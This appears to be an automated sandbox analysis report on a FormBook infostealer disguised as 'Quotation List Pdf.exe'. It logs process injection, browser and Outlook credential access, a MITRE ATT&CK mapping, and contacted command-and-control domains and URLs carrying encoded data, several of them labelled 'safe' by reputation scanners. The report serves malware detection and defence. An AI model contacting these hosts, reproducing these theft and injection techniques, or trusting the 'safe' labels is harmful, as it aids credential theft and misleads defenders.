            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exeNtAllocateVirtualMemory: Direct from: 0x774648ECJump to behavior
            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exeNtQuerySystemInformation: Direct from: 0x774648CCJump to behavior
            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exeNtQueryVolumeInformationFile: Direct from: 0x77462F2CJump to behavior
            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exeNtReadVirtualMemory: Direct from: 0x77462E8CJump to behavior
            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exeNtCreateKey: Direct from: 0x77462C6CJump to behavior
            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exeNtSetInformationThread: Direct from: 0x77462B4CJump to behavior
            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exeNtQueryAttributesFile: Direct from: 0x77462E6CJump to behavior
            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exeNtDeviceIoControlFile: Direct from: 0x77462AECJump to behavior
            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exeNtOpenSection: Direct from: 0x77462E0CJump to behavior
            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exeNtCreateFile: Direct from: 0x77462FECJump to behavior
            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exeNtOpenFile: Direct from: 0x77462DCCJump to behavior
            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exeNtQueryInformationToken: Direct from: 0x77462CACJump to behavior
            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exeNtTerminateThread: Direct from: 0x77462FCCJump to behavior
            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exeNtAllocateVirtualMemory: Direct from: 0x77462BECJump to behavior
            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exeNtOpenKeyEx: Direct from: 0x77462B9CJump to behavior
            Injects a PE file into a foreign processes
            Source: C:\Users\user\Desktop\Quotation List Pdf.exeMemory written: C:\Windows\System32\svchost.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\Desktop\Quotation List Pdf.exeMemory written: C:\Windows\regedit.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\Desktop\Quotation List Pdf.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000 value starts with: 4D5AJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: NULL target: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: NULL target: C:\Windows\SysWOW64\PING.EXE protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\PING.EXESection loaded: NULL target: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\PING.EXESection loaded: NULL target: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\PING.EXESection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\PING.EXESection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\PING.EXEThread register set: target process: 4788Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\PING.EXEThread APC queued: target process: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exeJump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\Quotation List Pdf.exeMemory written: C:\Windows\System32\svchost.exe base: 400000Jump to behavior
            Source: C:\Users\user\Desktop\Quotation List Pdf.exeMemory written: C:\Windows\System32\svchost.exe base: 401000Jump to behavior
            Source: C:\Users\user\Desktop\Quotation List Pdf.exeMemory written: C:\Windows\regedit.exe base: 400000Jump to behavior
            Source: C:\Users\user\Desktop\Quotation List Pdf.exeMemory written: C:\Windows\regedit.exe base: 401000Jump to behavior
            Source: C:\Users\user\Desktop\Quotation List Pdf.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000Jump to behavior
            Source: C:\Users\user\Desktop\Quotation List Pdf.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 401000Jump to behavior
            Source: C:\Users\user\Desktop\Quotation List Pdf.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 511C008Jump to behavior
            Source: C:\Users\user\Desktop\Quotation List Pdf.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\System32\svchost.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Quotation List Pdf.exeProcess created: C:\Windows\regedit.exe "C:\Windows\regedit.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Quotation List Pdf.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"Jump to behavior
            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exeProcess created: C:\Windows\SysWOW64\PING.EXE "C:\Windows\SysWOW64\PING.EXE"Jump to behavior
            Source: C:\Windows\SysWOW64\PING.EXEProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: tiwTBKVufjvhPL.exe, 00000006.00000002.3299223371.0000000000DE0000.00000002.00000001.00040000.00000000.sdmp, tiwTBKVufjvhPL.exe, 00000006.00000000.1477536448.0000000000DE0000.00000002.00000001.00040000.00000000.sdmp, tiwTBKVufjvhPL.exe, 00000009.00000000.1624702526.0000000001431000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: tiwTBKVufjvhPL.exe, 00000006.00000002.3299223371.0000000000DE0000.00000002.00000001.00040000.00000000.sdmp, tiwTBKVufjvhPL.exe, 00000006.00000000.1477536448.0000000000DE0000.00000002.00000001.00040000.00000000.sdmp, tiwTBKVufjvhPL.exe, 00000009.00000000.1624702526.0000000001431000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: tiwTBKVufjvhPL.exe, 00000006.00000002.3299223371.0000000000DE0000.00000002.00000001.00040000.00000000.sdmp, tiwTBKVufjvhPL.exe, 00000006.00000000.1477536448.0000000000DE0000.00000002.00000001.00040000.00000000.sdmp, tiwTBKVufjvhPL.exe, 00000009.00000000.1624702526.0000000001431000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: 0Program Manager
            Source: tiwTBKVufjvhPL.exe, 00000006.00000002.3299223371.0000000000DE0000.00000002.00000001.00040000.00000000.sdmp, tiwTBKVufjvhPL.exe, 00000006.00000000.1477536448.0000000000DE0000.00000002.00000001.00040000.00000000.sdmp, tiwTBKVufjvhPL.exe, 00000009.00000000.1624702526.0000000001431000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\Quotation List Pdf.exeCode function: 0_2_00007FF76849BDA4 cpuid 0_2_00007FF76849BDA4
            Source: C:\Users\user\Desktop\Quotation List Pdf.exeCode function: GetLocaleInfoEx,0_2_00007FF768500D30
            Source: C:\Users\user\Desktop\Quotation List Pdf.exeCode function: 0_2_00007FF76849BA10 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF76849BA10

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000002.1557293648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3299718726.0000000003450000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3299760610.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3299617930.0000000003410000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.1557934690.0000000007A30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3297787952.0000000003080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.1557553662.0000000005780000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3302954162.0000000005210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\PING.EXEFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\PING.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\PING.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\PING.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\PING.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\PING.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\PING.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\PING.EXEFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\PING.EXEKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000002.1557293648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3299718726.0000000003450000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3299760610.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3299617930.0000000003410000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.1557934690.0000000007A30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3297787952.0000000003080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.1557553662.0000000005780000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3302954162.0000000005210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Native API            		1
            DLL Side-Loading            		1
            Abuse Elevation Control Mechanism            		1
            Deobfuscate/Decode Files or Information            		1
            OS Credential Dumping            		1
            System Time Discovery            		Remote Services1
            Archive Collected Data            		3
            Ingress Tool Transfer            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
            DLL Side-Loading            		1
            Abuse Elevation Control Mechanism            		LSASS Memory2
            File and Directory Discovery            		Remote Desktop Protocol1
            Data from Local System            		1
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            Access Token Manipulation            		3
            Obfuscated Files or Information            		Security Account Manager124
            System Information Discovery            		SMB/Windows Admin Shares1
            Email Collection            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook612
            Process Injection            		1
            Software Packing            		NTDS121
            Security Software Discovery            		Distributed Component Object ModelInput Capture4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            DLL Side-Loading            		LSA Secrets3
            Virtualization/Sandbox Evasion            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Modify Registry            		Cached Domain Credentials2
            Process Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
            Virtualization/Sandbox Evasion            		DCSync1
            Application Window Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            Access Token Manipulation            		Proc Filesystem1
            Remote System Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt612
            Process Injection            		/etc/passwd and /etc/shadow1
            System Network Configuration Discovery            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1465353 Sample: Quotation List Pdf.exe Startdate: 01/07/2024 Architecture: WINDOWS Score: 100 34 www.ngkwnq.xyz 2->34 36 www.ajjmamlllqqq.xyz 2->36 38 17 other IPs or domains 2->38 46 Snort IDS alert for network traffic 2->46 48 Malicious sample detected (through community Yara rule) 2->48 50 Multi AV Scanner detection for submitted file 2->50 54 5 other signatures 2->54 10 Quotation List Pdf.exe 1 2->10         started        signatures3 52 Performs DNS queries to domains with low reputation 36->52 process4 signatures5 66 Writes to foreign memory regions 10->66 68 Allocates memory in foreign processes 10->68 70 Injects a PE file into a foreign processes 10->70 13 vbc.exe 10->13         started        16 conhost.exe 10->16         started        18 svchost.exe 10->18         started        20 regedit.exe 10->20         started        process6 signatures7 72 Maps a DLL or memory area into another process 13->72 22 tiwTBKVufjvhPL.exe 13->22 injected process8 signatures9 56 Found direct / indirect Syscall (likely to bypass EDR) 22->56 25 PING.EXE 13 22->25         started        process10 signatures11 58 Tries to steal Mail credentials (via file / registry access) 25->58 60 Tries to harvest and steal browser information (history, passwords, etc) 25->60 62 Modifies the context of a thread in another process (thread injection) 25->62 64 3 other signatures 25->64 28 tiwTBKVufjvhPL.exe 25->28 injected 32 firefox.exe 25->32         started        process12 dnsIp13 40 www.mycaringfriend.online 3.33.244.179, 49713, 49714, 49715 AMAZONEXPANSIONGB United States 28->40 42 www.marttyes.top 203.161.41.207, 49717, 49719, 49720 VNPT-AS-VNVNPTCorpVN Malaysia 28->42 44 8 other IPs or domains 28->44 74 Found direct / indirect Syscall (likely to bypass EDR) 28->74 signatures14

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            Quotation List Pdf.exe47%ReversingLabsWin64.Trojan.Dacic

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
            https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
            https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
            http://www.ngkwnq.xyz/44zl/0%Avira URL Cloudsafe
            http://www.te74y.top/fuua/?hv=3fNRerFIk63V1+IMAu4qlsMdt7YNs0EnlFsxF2g0jvBo5aDcf8mM3XhGrDpzzYUjwL0bjZmkMy0lhAUZIEhvtJpfy2aMBt81fLEje/cDaztKC30TKJAPkx8cZzQFh5/qVA==&Sbzdb=DvgXWdN0%Avira URL Cloudsafe
            https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js0%Avira URL Cloudsafe
            http://www.yvw66.top/e5ni/?hv=5igWVKYME1F2HJuEqzDD4BytRWNfFWn6ld9EO0nuwIC7ejuHGgZWNZHr69K3UvIzgGWBTOng6QRLO5bRM99dWtUQcUECcC3CaxVjbCwQta3fR2FUS95NK5IjfJQajbbRQA==&Sbzdb=DvgXWdN0%Avira URL Cloudsafe
            http://www.marttyes.top/o2rg/0%Avira URL Cloudsafe
            https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js0%Avira URL Cloudsafe
            https://download.quark.cn/download/quarkpc?platform=android&ch=pcquark0%Avira URL Cloudsafe
            http://www.fundraiserstuffies.com/vapn/0%Avira URL Cloudsafe
            https://aka.ms/nativeaot-c0%Avira URL Cloudsafe
            http://www.mycaringfriend.online/4xhu/?hv=kUigRkBAqBt1RQ4PHNukF4xZPToH+1QI6otQDXJCvCY9YbUgfI2Re+iS8c4dlot+geZi3vfTzLYXZH9sWq6jT8j+eYYKaAUwNfi+eLrrbumEku+3ygxonLPUoh3L9hGJlw==&Sbzdb=DvgXWdN0%Avira URL Cloudsafe
            http://www.ngkwnq.xyz/44zl/?hv=cT3mCg7Cmib/+TsqKgcGcLNa3rN7XS3dP4LITboVuuCqI7qZSFFYJV7Jt59+pqQMU8QRjoSmjIZC25OqP8KY8gmteTpLVZlDreUlLLyNnWL1wa1Nczp2K6xKprp1RRbIsA==&Sbzdb=DvgXWdN0%Avira URL Cloudsafe
            http://www.eoghenluire.com/jtz4/0%Avira URL Cloudsafe
            https://track.uc.cn/collect0%Avira URL Cloudsafe
            https://aka.ms/nativeaot-compatibilityy0%Avira URL Cloudsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
            http://www.yvw66.top/e5ni/0%Avira URL Cloudsafe
            http://www.ajjmamlllqqq.xyz0%Avira URL Cloudsafe
            http://www.ajjmamlllqqq.xyz/5lw2/0%Avira URL Cloudsafe
            http://www.fundraiserstuffies.com/vapn/?hv=zIQCtJPr8f6IEHIEo3TNC67HH9mmSCxic5WS7/A3sw1OteiabhN4nVuyPRk+K2L+MLR9kC9TPTQdF4ehIT0bCTCmTt1bteoRMu1plsZV53w6ucKr+pMiAUHXVfrsn+3QcA==&Sbzdb=DvgXWdN0%Avira URL Cloudsafe
            http://www.sponsoraveteran.info/v1kj/?hv=doj+6iUDZydJqFVnCXjkp3F4RUW5KXgrYHqPdL8oMaa0q7VqYsyQxdbUVD3Fk32bJgHvLY4KB1BicN6WuEPq/9BNjeLnpFWO+QoiBFVxHjC/ELqB/38Ky5muYdCtwXhrYw==&Sbzdb=DvgXWdN0%Avira URL Cloudsafe
            http://www.mycaringfriend.online/4xhu/0%Avira URL Cloudsafe
            http://www.marttyes.top/o2rg/?hv=HosprsjiipEFZkdlXtfyIs2HS8VP0Lx1JctxEV0LpDy1TX4kdcFD2HTZ1ZNwt0d2CmaO7pR5URztAlcHvOxdSj57tnDbyp24LsG2z7IhVzqV3j0gtM8YC4wacEpxZhptTA==&Sbzdb=DvgXWdN0%Avira URL Cloudsafe
            http://www.evoolihubs.shop/z6sg/?hv=zih0DoxsYMMKz8ZABxgT1WFK2McCJpyMbPq/OME2Y84w2Vm66kFudiKZ8IXY1l1UIMuRoxNGX/afyyUEkrlqrKni6t8ICyCnTx8av+sD3Gyos8WHaN8U0OpOBqhAw2rkZw==&Sbzdb=DvgXWdN0%Avira URL Cloudsafe
            http://www.sponsoraveteran.info/v1kj/0%Avira URL Cloudsafe
            http://www.aquamotricidad.com/8lwi/?hv=VRq/gdJR4rGg5JPfAG5ylFJXonLci7il5oNXQSZCeVYj1ovZxvPBP2fSASRs9V/B8emNhLugTvQrnEJ4A2g8ywXJhi2TGyyLJT3xrxwpBdhnsBD5VEgEmoQil+34l9QVbw==&Sbzdb=DvgXWdN0%Avira URL Cloudsafe
            https://hm.baidu.com/hm.js?0%Avira URL Cloudsafe
            https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.e96dc6dc6863835f4ad0.js0%Avira URL Cloudsafe
            https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js0%Avira URL Cloudsafe
            https://aka.ms/nativeaot-compatibility0%Avira URL Cloudsafe
            http://www.aquamotricidad.com/8lwi/0%Avira URL Cloudsafe
            http://www.poodlemum.com/17ef/?hv=BkwgEDM72plk1SoNdv8pOFX/Y0L1Y0wMy+4dvxwo/Oj/80wh3Wvb7+zqtjdXyImQl2Jnvy48BKhjFvscwh0k3TFr3WzonWtP3CiK72Em1Tp7LQVto/HSEXKZGZ++Ap7pGg==&Sbzdb=DvgXWdN0%Avira URL Cloudsafe
            https://aka.ms/GlobalizationInvariantMode0%Avira URL Cloudsafe
            https://www.evoolihubs.shop/z6sg/?hv=zih0DoxsYMMKz8ZABxgT1WFK2McCJpyMbPq/OME2Y84w2Vm66kFudiKZ8IXY1l10%Avira URL Cloudsafe
            http://www.poodlemum.com/17ef/0%Avira URL Cloudsafe
            http://www.te74y.top/fuua/0%Avira URL Cloudsafe
            http://www.ajjmamlllqqq.xyz/5lw2/?hv=iESIo6eVsdqcOmRYuFlUcr07YKkPV6iF6CPlu5h9EhLBhYFmo+CVfgok2cyX/3C89hOXIPK4L028RRlOYTTbn0S9j8UWgSdZAw9+mXeQ1LVvSh67jDUK/iIxNMtsobgO7w==&Sbzdb=DvgXWdN0%Avira URL Cloudsafe
            https://image.uc.cn/s/uae/g/3o/berg/static/index.c4bc5b38d870fecd8a1f.css0%Avira URL Cloudsafe
            http://www.eoghenluire.com/jtz4/?hv=r1qQkpPieaVsNUG68+02NppS6IukHQ6wFXr4oQU+uO/CVftnLbVi7u9JfCXfhwamzeJuyCR7X8qwC2gN3XV8echUBAJmUx7G1CfEdwxlKk1EGrOsAByXTICV/hREjOoViQ==&Sbzdb=DvgXWdN0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            www.evoolihubs.shop
            		188.114.97.3
            		truefalse
              		unknown
              sponsoraveteran.info
              		3.33.130.190
              		truefalse
                		unknown
                www.ngkwnq.xyz
                		35.241.41.54
                		truefalse
                  		unknown
                  www.ajjmamlllqqq.xyz
                  		35.244.172.47
                  		truefalse
                    		unknown
                    www.mycaringfriend.online
                    		3.33.244.179
                    		truetrue
                      		unknown
                      aquamotricidad.com
                      		81.88.48.71
                      		truefalse
                        		unknown
                        www.marttyes.top
                        		203.161.41.207
                        		truefalse
                          		unknown
                          poodlemum.com
                          		3.33.130.190
                          		truefalse
                            		unknown
                            fundraiserstuffies.com
                            		3.33.130.190
                            		truefalse
                              		unknown
                              te74y.top
                              		38.47.207.94
                              		truefalse
                                		unknown
                                eoghenluire.com
                                		76.223.105.230
                                		truefalse
                                  		unknown
                                  yvw66.top
                                  		38.47.232.185
                                  		truefalse
                                    		unknown
                                    www.eoghenluire.com
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.yvw66.top
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.aquamotricidad.com
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          www.te74y.top
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.sponsoraveteran.info
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              www.fundraiserstuffies.com
                                              		unknown
                                              		unknowntrue
                                                		unknown
                                                www.poodlemum.com
                                                		unknown
                                                		unknowntrue
                                                  		unknown

                                                  Contacted URLs

                                                  NameMaliciousAntivirus DetectionReputation
                                                  http://www.marttyes.top/o2rg/false
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.ngkwnq.xyz/44zl/false
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.yvw66.top/e5ni/?hv=5igWVKYME1F2HJuEqzDD4BytRWNfFWn6ld9EO0nuwIC7ejuHGgZWNZHr69K3UvIzgGWBTOng6QRLO5bRM99dWtUQcUECcC3CaxVjbCwQta3fR2FUS95NK5IjfJQajbbRQA==&Sbzdb=DvgXWdNfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.te74y.top/fuua/?hv=3fNRerFIk63V1+IMAu4qlsMdt7YNs0EnlFsxF2g0jvBo5aDcf8mM3XhGrDpzzYUjwL0bjZmkMy0lhAUZIEhvtJpfy2aMBt81fLEje/cDaztKC30TKJAPkx8cZzQFh5/qVA==&Sbzdb=DvgXWdNfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.fundraiserstuffies.com/vapn/false
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.mycaringfriend.online/4xhu/?hv=kUigRkBAqBt1RQ4PHNukF4xZPToH+1QI6otQDXJCvCY9YbUgfI2Re+iS8c4dlot+geZi3vfTzLYXZH9sWq6jT8j+eYYKaAUwNfi+eLrrbumEku+3ygxonLPUoh3L9hGJlw==&Sbzdb=DvgXWdNtrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.eoghenluire.com/jtz4/false
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.ngkwnq.xyz/44zl/?hv=cT3mCg7Cmib/+TsqKgcGcLNa3rN7XS3dP4LITboVuuCqI7qZSFFYJV7Jt59+pqQMU8QRjoSmjIZC25OqP8KY8gmteTpLVZlDreUlLLyNnWL1wa1Nczp2K6xKprp1RRbIsA==&Sbzdb=DvgXWdNfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.yvw66.top/e5ni/false
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.fundraiserstuffies.com/vapn/?hv=zIQCtJPr8f6IEHIEo3TNC67HH9mmSCxic5WS7/A3sw1OteiabhN4nVuyPRk+K2L+MLR9kC9TPTQdF4ehIT0bCTCmTt1bteoRMu1plsZV53w6ucKr+pMiAUHXVfrsn+3QcA==&Sbzdb=DvgXWdNfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.ajjmamlllqqq.xyz/5lw2/false
                                                  • Avira URL Cloud: safe
                                                  		unknown
